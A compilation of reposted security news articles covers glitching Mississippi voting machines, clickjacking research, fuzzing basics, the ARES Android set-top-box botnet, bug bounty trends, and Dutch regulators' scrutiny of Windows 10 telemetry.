STE WILLIAMS

Video captures glitching Mississippi voting machines flipping votes

“It is not letting me vote for who I want to vote for,” a Mississippi voter said in a video that shows him repeatedly pushing a button on an electronic touch-screen voting machine that keeps switching his vote to another candidate.

On Tuesday morning, the date of Mississippi’s Republican primary election for governor, the video was posted to Twitter…

…and to Facebook by user Sally Kate Walker, who wrote this as a caption:

Ummmm … seems legit, Mississippi.

Walker said in a comment that the incident happened in Oxford, Miss., in Lafayette County. A local paper, the Clarion Ledger, reported that as of Tuesday night, there were at least three reports confirmed by state elections officials of voting machines in two counties changing voters’ selections in the state’s GOP governor primary runoff.

The machines were switching voters’ selections from Bill Waller Jr.- a former Supreme Court Chief justice – to Lt. Gov. Tate Reeves. Waller’s campaign told the Clarion Ledger it also received reports of misbehaving voter machines in at least seven other counties.

Waller conceded to Reeves around 9 p.m. on Tuesday night. With Reeves leading 54% to Waller’s 46%, it looks unlikely that the glitches affected the outcome.

Before the malfunctioning machine was discovered in Lafayette County, the machine – reportedly a paperless AccuVote TSX from Diebold – only recorded 19 votes, according to Anna Moak, a spokeswoman for the Secretary of State’s Office. A technician was dispatched, and the machine is being replaced, she said.

Moak said that the machines are “county-owned and tested by local officials” and “to our knowledge, only one machine was malfunctioning.” State elections officials later confirmed that at least three machines in two counties had been switching votes.

The incident underscores concerns of election security advocates who’ve long warned that electronic voting systems – particularly the types in use in Mississippi, which fail to generate a verified paper backup – are a security risk because neither election officials nor the public are able to audit the results.

Lawrence Norden, co-author of a September 2015 report for the Brennan Center for Justice titled “America’s Voting Machines at Risk,” wrote in a 2017 blog post that 14 states, “including some jurisdictions in Georgia, Pennsylvania, Virginia, and Texas – still use paperless electronic voting machines.”

Those systems should be replaced “as soon as possible,” he said, and the best way to do that is decidedly low-tech:

The most important technology for enhancing security has been around for millennia: paper. Specifically, every new voting machine in the United States should have a paper record that the voter reviews, and that can be used later to check the electronic totals that are reported.

This could be a paper ballot the voter fills out before it is scanned by a machine, or a record created by the machine on which the voter makes her selections – so long as she can review that record and make changes before casting her vote.

Earlier this month, Norden, along with Andrea Córdova and Liz Howard, posted an update to the Brennan Center for Justice, regarding where we stand six months before the New Hampshire primary.

Last year, in spite of Congress providing $380 million to states to help with voting technology upgrades, it wasn’t enough, they said.

Experts agree that, due to security and reliability, systems over a decade old need to be replaced. But by the Brennan Center’s estimate, as of November 2018, 34% of all local election jurisdictions in the US were using voting machines that were at least 10 years old: a number that includes counties and towns in 41 states.

Progress is being made: nearly half of states with paperless voting machines in 2016 will have replaced those machines by the 2020 elections. However, that still leaves as many as 16 million voters who’ll be casting votes on paperless, non-auditable systems in the 2020 election.

More from this week: the federal government, fearing state-sponsored ransomware attacks, is reportedly looking to boost protection for voter registration databases and systems ahead of the 2020 election.

On Monday, Reuters reported that the government plans to launch a program in about a month that will protect those databases and systems, which are used to validate the eligibility of voters.

Current and former officials told Reuters that such systems are deemed high risk, given that they’re one of the few pieces of technology that regularly connects to the internet.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/S5QpMILdY0g/

Web clickjacking fraud makes a comeback thanks to JavaScript tricks

More than a decade after hitting the headlines, clickjacking fraud remains an under-reported hazard on hundreds of popular websites, a team of university researchers has found.

Clickjacking, or UI redressing, encompasses a range of techniques through which fraudsters hide something that you almost certainly wouldn’t click on, such as an unwanted ad, behind something that looks innocent, such as a bogus ‘Facebook Like’ button.

In practice, clickjacking takes many different forms, but what all have in common is that the page element you are clicking on has a hidden purpose.

The appeal of clickjacking to criminals is that it involves getting web users to do the clicking for them, which helps to make the fake clicks seem convincing.

The crooks could use robotic clickfraud to do the same job – indeed, many do – but machine clicks are often easier to detect, for example because they come from IP addresses associated with botnets, or produce patterns of clicks that look unnatural.

Bad clicks

In All Your Clicks Belong to Me: Investigating Click Interception on the Web, the team from The University of Hong Kong, Seoul University, Pennsylvania State University, and Microsoft Research, used a browser tool called Observer to analyse clicks on the top 250,000 Alexa-ranked sites, discovering 437 different clickjacking scripts on 613 websites.

While a small percentage of the total, these sites were still estimated to receive more than 600 million daily visits between them.

Predictably, around a third of sites used clickjacking for advertising fraud. The researchers didn’t have time to delve much further than this for other motivations but scamware such as fake antivirus was also in evidence.

While clickjacking scams have been a problem for more than a decade, the technical underpinnings of how the clickjacking happens through click interception continue to evolve, especially through the possibilities offered by JavaScript.

The researchers divided these into three techniques – interception by hyperlinks, interception by event handlers, and interception by visual deception.

Visual deception is the most straightforward of these – using visual tricks such as the mimicking of legitimate page elements to persuade users to click on something (i.e. hiding bad stuff behind what looks OK). This was used by about 20% of advertising clickfraud.

Another technique – used by 11% of advertising clickfraud – is to use programmed event handlers that are part of the site’s code to drive users to third-party URLs in ways that are hard to detect.

The most popular technique of all involved intercepting hyperlinks that users had clicked on by overwriting the href (hyperlink) attribute or by turning the entire page into a huge clickable element. The researchers conclude:

Existing studies mainly consider one type of click interceptions in the cross-origin settings via iframes, i.e., clickjacking. This does not comprehensively represent various types of click interceptions that can be launched by malicious third-party JavaScript code.

The researchers also noted that some websites deliberately participate in clickjacking scams for financial gain. Bluntly:

We revealed that some websites collude with third-party scripts to hijack user clicks for monetization.

Ironically, it could be that better detection of machine-made clicks is partly to blame for the increased use of old-style clickfraud that exploits humans instead.

If that trend continues, we could see an upsurge in clickjacking reengineered to be more sophisticated than the wave of a decade ago. Sometimes the old tricks turn out to be the best ones.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wf8a5TMpoNo/

S2 Ep6: Instagram phishing, jailbreaking iPhones and social media hoaxes – Naked Security Podcast

Episode 6 of the Naked Security Podcast is now live!

This week, host Anna Brading is joined by Mark Stockley and Paul Ducklin to discuss jailbreaking iPhones [2’50”], sophisticated Instagram phishing [14’02”] and the latest social media hoax [28’23”].

As always, we love answering your cybersecurity questions on the show – simply comment below or ask us on social media.

Listen now and tell us what you think!

Listen and rate via iTunes...
Sophos podcasts on Soundcloud...
RSS feed of Sophos podcasts...

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cspLadXBXE0/

Fuzzing 101: Why Bug Hunters Still Love It After All These Years

Fuzzing is one of the basic tools in a researcher’s arsenal. Here are the things you should know about this security research foundational tool.

Image by Jen Goellnitz, creative commons

When you’re in the kitchen and throw pasta against the wall, it might stick so that you can tell whether it’s cooked. When you’re in computer security and you throw things against a target’s “wall,” they might do nothing … they might blow up the wall. Or they might land you in a different place entirely. That’s the allure — and the danger — of “fuzzing” as a research tool.

To understand what fuzzing is and why it’s so valuable, we go back 30 years to “An Empirical Study of the Reliability of UNIX Utilities,” a paper written by lead author Barton P. Miller, the “father of fuzzing.” In that paper, and in its 1995 follow-up “Fuzz Revisited,” Barton and his co-authors present the technique of throwing unanticipated input at utilities and programs to see what happens.

In the original paper, Barton wrote that the idea of fuzzing was born in line noise from a dial-up network connection. When random characters in the exchange caused a program to crash, it led researchers to wonder whether a tool generating random input strings could be valuable when looking at application security and reliability. As it turns out, it can be quite valuable — and the method can aid in discovering a host of vulnerabilities and errors.

What Can Fuzzing Discover?
The errors and vulnerabilities that fuzzing can discover tend to fall into four broad categories: invalid inputs, memory leaks, assertion failures, and incorrect results or connections. A separate area of fuzzing is used in credential stuffing attacks. Each can result in its own form of insecurity for the application or system owner.

Invalid input: In almost every application that accepts user input, the program expects the input to be in a particular format. But what happens if, for example, a text string is entered into a date field? What happens if a series of emojis is entered into a name field? In both cases, type-checking functions should throw away the input and issue an error, but rushed developers don’t always include robust type-checking in their code. That’s when the vulnerabilities begin.

Memory leaks: Memory leaks — when applications use memory for instructions and data, they’re supposed to clean up after themselves, releasing the memory to be used again and keeping everything within the nice, neat, logical boundaries that computers love. Unfortunately, some programmers don’t follow best practices and some programming languages thwart the best memory management efforts. Because of this, over time, memory becomes cluttered with stray data, information is stored where it shouldn’t be, and havoc ensues. Stuffing excessively large input into applications can speed up the process if good input-validation isn’t in place, and fuzzing can help figure out where those opportunities for mayhem reside.

Assertion failure: Many applications assume that you’ve followed a logical path to get to a given point. That tends to mean that qualifications have been met and states set before you do what you’re doing now. But what if those states haven’t been set and those qualifications haven’t been met? If you’re still allowed to proceed, then an assertion failure has occurred — something the program was expecting hasn’t yet happened. Fuzzing is a great way to see if you can “skip the line” and get somewhere you shouldn’t be.

Unexpected connections: Fuzzing can help answer the question, “What if, instead of my first name, I entered a SQL command here?” Or, “What if I entered a URL where the application was expecting something else?” In each of these cases, if anything but a discarded input and error message result, then a vulnerability has been discovered.

Credential stuffing: Report after report show that human beings tend to rely on a handful of common, easily typed passwords for online accounts. And organizations tend to use a handful of formats for generating email addresses for employees. Attackers (or pen testers) can then try all of the common password types with each possible email address — statistically, they’ll get at least a few successful logins for each organization. Of course, running through all of the permutations can take time, unless the attacker is using an automated tool for fuzzing credentials.

Fuzzing Tools
In order to truly explore each type of vulnerability, a researcher must try a variety of different possibilities for each targeted input field. It would take far too much time to do this manually, so a variety of different automated tools have been developed to make the process faster and easier.

There are a number of free tools available for fuzzing. Among them are:

While not a simple fuzzing tool, Google OSS-fuzz is used by many researchers and can be a valuable tool for learning a complete research process around fuzzing. And it’s important to note that Barton has maintained a web page about fuzzing, including a link to download all the software, definitions, and targets in his original research, at the University of Wisconsin-Madison.

Related Content:

 

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/edge/theedge/fuzzing-101-why-bug-hunters-still-love-it-after-all-these-years/b/d-id/1335672?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Privacy 2019: We’re Not Ready

To facilitate the innovative use of data and unlock the benefits of new technologies, we need privacy not just in the books but also on the ground.

Omer Tene, VP, International Association of Privacy Professionals (IAPP), also contributed to this article.

By any measure, this summer has been a busy time for privacy news. It started with a flurry of enforcement activity in Europe, including announcements from the UK privacy regulator of fines in the amount of $230 million against British Airways and $125 million against Marriott. It continued with a high-stakes standoff in Europe’s highest court between Max Schrems (a prominent privacy advocate), Facebook, and the Irish Data Protection Commissioner, which could jeopardize the future of transatlantic data flows. Finally, it ended with a big bang, with news publicly released to the humdrum of a summery Friday afternoon of the FTC’s $5 billion fine against Facebook in connection with the Cambridge Analytica scandal.

The message resonated loud and clear in corporate boardrooms from Silicon Valley to London: Privacy has become a first-order media and regulatory concern.

How should businesses respond to this new drumbeat of privacy outcries and enforcement actions? The risks of data mismanagement — measuring hundreds of millions of dollars and including security breaches, inappropriate information sharing, and “creepy” data uses — are no longer an acceptable cost of doing business, making it abundantly clear that society cannot experience the full benefits of a digital economy without investing in privacy.

The good news is that the public has recognized the gravity of the problem. Breakthroughs in healthcare, smart traffic, connected communities, and artificial intelligence (AI) confer tremendous societal benefits but, at the same time, create chilling privacy risks. The bad news is that we’re hardly ready to address these issues. As Berkeley professors Deirdre Mulligan and Kenneth Bamberger wrote in Privacy on the Ground: Driving Corporate Behavior in the United States and Europe, it’s one thing to have privacy “on the books,” but it’s quite another thing to have privacy “on the ground.”

According to research by the International Association of Privacy Professionals (IAPP), more than 500,000 organizations have already registered data protection officers in Europe. Yet only a fraction of those roles can actually be staffed by individuals who are trained on privacy law, technologies, and operations. To rein in data flows across thousands of data systems, sprawling networks of vendors, cloud architectures, and machine learning algorithms, organizations large and small must deploy highly qualified people, technologies, and processes that are still in the early developmental stage.   

First, the people who will serve as foot soldiers of this army of professionals must be modern-day renaissance persons. They have to be well-versed on the technology, engineering, management, law, ethics, and policy of the digital economy. They need to apply lofty principles like privacy, equality, and freedom in day-to-day operational settings to disruptive tech innovations such as facial recognition, consumer genetics, and AI. They need to not only understand the logic underlying black box machine learning processes but also the mechanics of algorithmic decision-making and the social and ethical norms that govern them. Unfortunately, existing academic curricula are siloed in areas such as law, engineering, and management. Government, academic, and accreditation bodies should work to lower the walls between disciplines to ensure that lawyers and ethicists talk not only to each other but also with computer scientists, IT professionals, and engineers.

Second, researchers and entrepreneurs are building a vast array of technologies to help companies and individuals protect privacy and data. Just last week, OneTrust, a privacy tech vendor, raised $200 million at a valuation of $1.3 billion, making it the first privacy tech unicorn merely three years after its launch. Some of these new technologies help organizations better handle their privacy compliance and data management obligations. Others provide consumers with tools to protect and manage their own data through de-identification, encryption, obfuscation, or identity management. Over the next few years, governments and policymakers should give organizations incentives to innovate not only around data analytics and use but also around protection of privacy, identity, and confidentiality.   

Third, organizations should deploy data governance processes and best practices to ensure responsible and accountable data practices. Such processes include privacy impact assessments, consent management platforms, data mapping and inventories, and ongoing accountability audits. With guidance from regulators and frameworks from standard-setting bodies, such as the National Institute of Standards and Technology, procedural best practices will develop for both public and private sector players.

Like so many complex societal issues, privacy concerns require a matrix of responses. We certainly need strong laws and effective enforcement, but organizations should also embrace their stewardship of data and invest in the processes and technologies to better manage their data stores. Importantly, we need to continue to educate and train professionals with the knowledge and skills to make ethical, responsible decisions about how data is handled. To facilitate innovative data uses and unlock the benefits of new technologies, we need privacy not only in the books but also on the ground.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Fuzzing 101: Why Bug-Finders Still Love It After All These Years.”

As president and CEO of the International Association of Privacy Professionals (IAPP), J. Trevor Hughes leads the world’s largest association of privacy professionals, which promotes, defines and supports the privacy profession globally.  Trevor is widely recognized as a … View Full Bio

Article source: https://www.darkreading.com/risk/privacy-2019-were-not-ready/a/d-id/1335621?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Botnet Targets Android Set-Top Boxes

ARES has already infected thousands of devices and is growing, IoT security firm says.

Thousands of Android set-top boxes of the sort used by people to stream media from Hulu, Netflix, and other services have been infected with malware and become part of a growing botnet of similarly compromised devices.

Internet of Things (IoT) security vendor WootCloud, which discovered the threat, has dubbed it the ARES ADB botnet. The botnet is being used as a launchpad to trigger multiple attacks such as brute-force password cracking, denial-of-service attacks, and cryptomining.

In a report this week, WootCloud described the botnet as targeting Android Debug Bridge (ADB), a management component on Android devices that enables debugging and remote management operations.

The ADB service is often left open and unauthenticated on many Internet-connected Android devices, giving attackers a way to access them and take full administrative control. “Accessing the device through TCP port 5555 results in obtaining shell which allows remote command execution, uploading/downloading of custom applications, data access,” and other activity, WootCloud warns.

The ARES botnet is the latest sign of attackers targeting vulnerable non-computer IoT devices to build botnets for a variety of malicious purposes. Following the Mirai botnet attacks of 2016, attackers have been actively targeting home routers, security cameras, DVRs, smart TVs, and other Internet-connected devices, which often have weak to no security protections. Many of these devices often provide unauthenticated remote access or are protected only with default passwords and cannot be easily patched or updated. Though many of the devices individually have little computing power, attackers are often able to infect tens of thousands of them at the same time to build botnets capable of doing considerable damage.

With the latest threat, attackers are actively exploiting the ADB configuration issue to install the ARES bot on Android-based set-top boxes from several vendors, including HiSilicon and Cubetek. Once the bot gets installed on a device, it starts scanning for other set-top boxes with similarly misconfigured ADB interfaces and then installs payloads for triggering additional attacks.

Most infections so far have been in South Asia and the broader Asia-Pacific region. The command-and-control servers with which infected devices have been communicating have been observed at multiple locations, including North America.

Potentially Major Impact
Srinivas Akella, founder and chief technology officer at WootCloud, says the ARES botnet poses a potentially major threat to the growing number of other Android-based set-top boxes that consumers and enterprises are using. “This botnet has the potential to affect smart TVs and other IoT devices that have a misconfigured ADB,” he says.

With standard Android images, the ADB is not enabled by default. However, several set-top boxes that are available today are running customized versions of the Android OS, which have been rooted and have ADB enabled by default, he says.

To protect against the ADB being misused in cases where it is left enabled, routers can be configured to block the ingress and egress network traffic to TCP port 5555, which is the port that ADB uses.

Enterprises should also configure their network policies to restrict ingress and egress network traffic to IoT devices. “Restrict the ADB interface on the IoT devices to authorized IP address space,” he says. “Monitor the ADB interface traffic originating from unknown resources, including the network traffic originating from these devices.”

Organizations should also ensure that interfaces on IoT devices such as telnet and SNMP are properly protected with strong passwords to prevent unauthorized access, Akella says.

Home users of vulnerable set-top boxes may have a slightly harder time mitigating the risk. A lot depends on the design of the set-top box and whether the vendor provides an option to disable ADB functionality. When the option is not available, “home users will need to have technical acumen to disable the ADB functionality either by setting up their routers to block traffic,” Akella says, “or by logging in to the device and disabling ADB services on the command prompt.”

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Fuzzing 101: Why Bug-Finders Still Love It After All These Years.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/new-botnet-targets-android-set-top-boxes/d/d-id/1335688?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Cloud Releases Beta of Managed Service to Microsoft AD

Managed Service for Microsoft Active Directory was built to help admins handle cloud-based workloads.

Google Cloud today released the public beta version of Managed Service for Microsoft Active Directory (AD), a move intended to help admins manage AD-dependent workloads in the cloud.

More apps and servers dependent on Microsoft AD are moving to the cloud, complicating processes for IT and security teams required to meet latency and security goals while also configuring and securing AD Domain Controllers. Managed Service for Microsoft AD was first debuted at the company’s Next 2019 conference in April.

The idea is to make it easier for admins to handle AD workloads, automate AD server maintenance and security configuration, and connect on-prem AD domains to the cloud.

Google Cloud’s service runs real AD Domain Controllsers so admins can use standard AD features such as Group Policy, as well as Remote Server Administration Tools and other tools to manage the domain. It’s automatically patched and has default security configurations in place. Admins can connect on-prem AD to Google Cloud or use a standalone domain for cloud-based workloads.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Fuzzing 101: Why Bug-Finders Still Love It After All These Years.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/google-cloud-releases-beta-of-managed-service-to-microsoft-ad/d/d-id/1335687?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Bug Bounties Continue to Rise, but Market Has Its Own 1% Problem

The average payout for a critical vulnerability has almost reached $3,400, but only the top bug hunters of a field of 500,000 are truly profiting.

Bug bounties continue to rise as more companies take part in crowdsourced challenges to attract security-minded freelancers and hackers to analyze their code, but the opportunities to profit typically fall to only a very small fraction of participants, according to security-program management firm HackerOne.

In its latest annual “Hacker-Powered Security Report,” the company found the average bounty paid to bug finders jumped to $3,384 for critical vulnerabilities, a 48% increase over the previous year’s average, with cryptocurrency and blockchain companies paying the most — $6,124, on average. In the past 12 months, more than 30,000 security issues were reported to HackerOne’s clients, which awarded vulnerability researchers with more than $21 million. 

Yet of the more than half-million hackers that have signed up for a HackerOne-managed challenge, only about 5,000 are really doing well, says CEO Marten Mikos.

“We have this enormous hacker community of half a million who are engaged and trying and competing,” he says. “It is a very small minority that rises to the top, and that is intentional.”

The report underscores the success of the bug-bounty model as a way to catch vulnerabilities in products and services. More than 1,400 organizations use HackerOne’s service and “hundreds” more use the crowdsourced security service of rival Bugcrowd. More than a quarter of HackerOne’s programs are for Internet and online services, and another 20% consist of computer software firms. However, financial services and media companies make up a significant part — more than 7% each — of the market.

Yet for the vast majority of interested researchers, the contest model does not work out. HackerOne boasts a half-dozen participants who have made more than $1 million on its platform, and another seven who have hit more than $500,000 in lifetime earnings — a tiny fraction of the more than 500,000 people who have signed up.

Mikos compares the winnowing of the competitive field to the struggle of becoming a movie star in Hollywood or going pro in basketball.

“Everyone plays basketball after school, but not everyone makes it the NBA,” he says. “We need to have the broadest community to find those very few unique individuals who have the curiosity, the aptitude, the interest, the discipline to succeed.”

The overall rise in bug bounties comes as no surprise. In its own report, crowdsourced-security firm Bugcrowd saw payouts for security issues through its own programs rise 83%, with bounties for critical vulnerabilities up 27% to $2,670. The most lucrative payouts in Bugcrowd’s analysis were from Internet of Things manufacturers, which paid an average of $8,556 per critical vulnerability.

Part of the reason for the rise is that companies are paying more to find more difficult classes of bugs, according to HackerOne. 

“Looking at the data, 4 out of 5 of the top VRT (vulnerability rating taxonomy) classes for 2018 revolve around vulnerabilities that are difficult, if not impossible, for any machine to find,” the company states in the report.

Both Microsoft and Google have recently raised their bounties. In July, for example, Google raised the maximum payouts for several classes of vulnerabilities in its services and products, with the maximum baseline reward jumping to $15,000 from $5,000. And earlier this year, Zerodium, which sells exploits to governments to allow them to surveil citizens, raised its reward for an exploit chain, which strings several vulnerabilities together to compromise a particular program or operating system, to $2 million for Apple’s iOS operating system.

Yet those rewards are only for finding the most lucrative vulnerabilities. Only 7% of issues found in HackerOne programs were critical, with another 18% considered to be of high severity. The vast majority of vulnerabilities — 75% — were of low or medium severity. While the average bounty across the HackerOne platform rose 65% in the past 12 months, finding those vulnerabilities are far less lucrative. 

The four industries that paid the highest bounties were cryptocurrency and blockchain companies, which paid $6,124 for critical issues; Internet and online service firms, which paid $4,973; aviation and aerospace firms, which paid $4,500; and electronics and semiconductor firms, which paid $4,398.

While rewards for most bugs continue to be low, the lure of bug-bounty competitions could play a significant role in attracting better talent to cybersecurity, which is in need of more personnel. 

“Out of that 500,000, maybe 50,000 will keep hacking, maybe 5,000 will become security professionals, and, out of that, maybe 500 will become CISOs,” he says. “The nice thing is it will happen automatically. We are driving it by making it very attractive to young people to learn in our ranks.”

Related Content:

 

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Fuzzing 101: Why Bug-Finders Still Love It After All These Years.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/vulnerability-management/bug-bounties-continue-to-rise-but-market-has-its-own-1--problem/d/d-id/1335689?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Announces New, Expanded Bounty Programs

The company is significantly expanding the bug-bounty program for Google Play and starting a program aimed at user data protection.

Google is upping its security game with the launch of a new Developer Data Protection Reward Program (DDPRP) and the significant expansion of the Google Play Security Reward Program (GPSRP).

According to the company, GPSRP will now include all Google Play apps with 100 million or more installs. The significant change is that all of these apps will be eligible for bug-bounty payment, even if the app publisher doesn’t run its own bug-bounty program. For those apps from publishers that do have existing bug-bounty programs, the GDSRP will now pay bounties in addition to those paid by the publisher.

The new DDPRP is being done in collaboration with HackerOne. The program is aimed at data-abuse issues in Android apps, OAuth projects, and Chrome extensions. The program, Google said in an announcement, is intended to reward any researcher providing “verifiably and unambiguous evidence of data abuse.”

Google noted that it is particularly interested in situations where user data is being sold unexpectedly or repurposed in an illegitimate manner without user consent.

For more, read here and here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Fuzzing 101: Why Bug Hunters Still Love It After All These Years.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/google-announces-new-expanded-bounty-programs/d/d-id/1335690?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft may still be violating privacy rules, says Dutch regulator

After the privacy hell-hole that was Windows 10 circa 2017-ish, you’re doing better, the Dutch Data Protection Authority (DPA) told Microsoft on Tuesday, but you still aren’t legally kosher, privacy-wise.

A very quick recap: Users howled. Regulators scowled. Microsoft tweaked in 2017. The DPA investigated those tweaks. The upshot of its investigation: the DPA has asked the Irish privacy regulator – the Irish Data Protection Commission, DPC – to re-investigate the privacy of Windows users.

What a long, strange privacy trip it’s been

A recap with more flesh on its bones: in 2015, Microsoft released Windows 10. From the get-go, France’s privacy watchdog – the National Data Protection Commission (CNIL) – had concerns about the operating system’s processing of personal data through telemetry.

Window 10’s release had sparked a storm of controversy over privacy: Concerns rose over the Wi-Fi password sharing feature, Microsoft’s plans to keep people from running counterfeit software, the inability to opt out of security updates, weekly dossiers sent to parents on their kids’ online activity, and the fact that Windows 10 by default was sharing a lot of users’ personal information – contacts, calendar details, text and touch input, location data, and more – with Microsoft’s servers.

After conducting tests, CNIL determined that there were plenty of reasons to think that Microsoft wasn’t compliant with the French Data Protection Act. In July 2016, it gave Microsoft three months to fix Windows 10 security and privacy.

After the CNIL’s warning and a slap from the Electronic Frontier Foundation (EFF), Microsoft made a series of changes to tackle the privacy concerns around Windows 10.

In January 2017, Microsoft launched a web-based privacy dashboard that let users pick and choose what information gets sent to the company – be it tracking data, speech recognition, diagnostics or advertising IDs that apps glue on to your system for targeted marketing.

OK, so Microsoft made some changes. Was it enough? No.

In October 2017, the DPA said that after looking into the privacy of users of Windows Home and Pro, it had concluded that Microsoft was still illegally processing personal data through telemetry. Specifically, it found that

Microsoft continuously collects technical performance and user data. This includes which apps are installed and, if the user has not changed the default settings, how often apps are used, as well as data on web surfing behaviour. These data are called ‘telemetry data’. Microsoft takes continuous pictures – as it were – of the behaviour of Windows users and sends them to itself.

The Dutch privacy watchdog ordered Microsoft to make more changes to Windows, which the company did in the April 2018 update. The DPA outlined what was expected from that update, to pull everything up to speed with the impending General Data Protection Regulation (GDPR):

Microsoft will ensure that users are better informed about the data it collects and what this data is used for. In addition, users can take active, straightforward steps to control their own privacy settings. In light of the new EU privacy law (the General Data Protection Regulation), which comes into force on 25 May 2018, the Dutch DPA has insisted that the update be implemented across the entire EU. Microsoft has agreed to do this, and the Dutch DPA will monitor implementation.

…all of which leads us up to now. So, how did that April 2018 update do?

Better, but maybe still in violation

The DPA said on Tuesday that the changes made in the April 2018 Windows update have led to “an actual improvement” in data privacy. But at the same time, it appears that… “Microsoft also collects other data from remote users.” Upshot:

As a result, Microsoft may still violate the privacy rules.

Therefore, the DPA says, it’s time for the lead privacy regulator in Europe – that would be the Irish DPC – to investigate further concerns about how Windows collects user data.

User beware

The Dutch data privacy regulator is also advising Windows users to “pay close attention to privacy settings when installing and using this software.”

Microsoft is permitted to process personal data if consent has been given in the correct way. We’ve found that Microsoft collect diagnostic and non-diagnostic data. We’d like to know if it is necessary to collect the non-diagnostic data and if users are well informed about this.

Does Microsoft collect more data than they need to (think about data minimalization as a base principle of the GDPR)? Those questions can only be answered after further examination.

The Irish DPC confirmed to TechCrunch that it received the Dutch regulator’s concerns last month. The publication quoted a DPC spokeswoman:

Since then the DPC has been liaising with the Dutch DPA to further this matter. The DPC has had preliminary engagement with Microsoft and, with the assistance of the Dutch authority, we will shortly be engaging further with Microsoft to seek substantive responses on the concerns raised.

And this is what Microsoft had to say on the matter:

The Dutch data protection authority has in the past brought data protection concerns to our attention, which related to the consumer versions of Windows 10, Windows 10 Home and Pro. We will work with the Irish Data Protection Commission to learn about any further questions or concerns it may have, and to address any further questions and concerns as quickly as possible.

Microsoft is committed to protecting our customers’ privacy and putting them in control of their information. Over recent years, in close coordination with the Dutch data protection authority, we have introduced a number of new privacy features to provide clear privacy choices and easy-to-use tools for our individual and small business users of Windows 10. We welcome the opportunity to improve even more the tools and choices we offer to these end users.

Are you so over ads while onboarding?

As one reader noted when we wrote up the 2017 privacy dashboard introduction, they were seeing ads every time they logged on to Windows 10. TechCrunch notes that during the onboarding process for Windows 10, Microsoft makes multiple requests to process user data for various reasons, including to serve ads to users.

As Naked Security’s Paul Ducklin responded at the time, he never saw ads on Windows 10, including at login, in spite of installing and reinstalling the operating system “any number of times” in the test rig he was using to get malware screenshots to use in his articles. But then, he knows where to look for the right options, he said:

When I do my installs I pick ‘custom’ and not ‘express settings’ at the relevant setup configuration prompt, and then turn all the options off using the toggles. I assume this helps reduce the tat that I see compared to what some other people are seeing.

TechCrunch also noted that Windows 10 uses its digital assistant, Cortana, to provide a running commentary on settings screens, including nudges to agree to the company’s TCs… If you want to run Windows, that is. From TechCrunch:

‘If you don’t agree, y’know, no Windows!’ the human-sounding robot says at one point.

Is that nudging one of the DPA’s concerns? It’s not clear yet. Time will tell, so tune in to next month’s/year’s episode, as this long-running privacy-regulator wrestling match continues. We’ll let you know when we do!

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/0qhmDvOnAaI/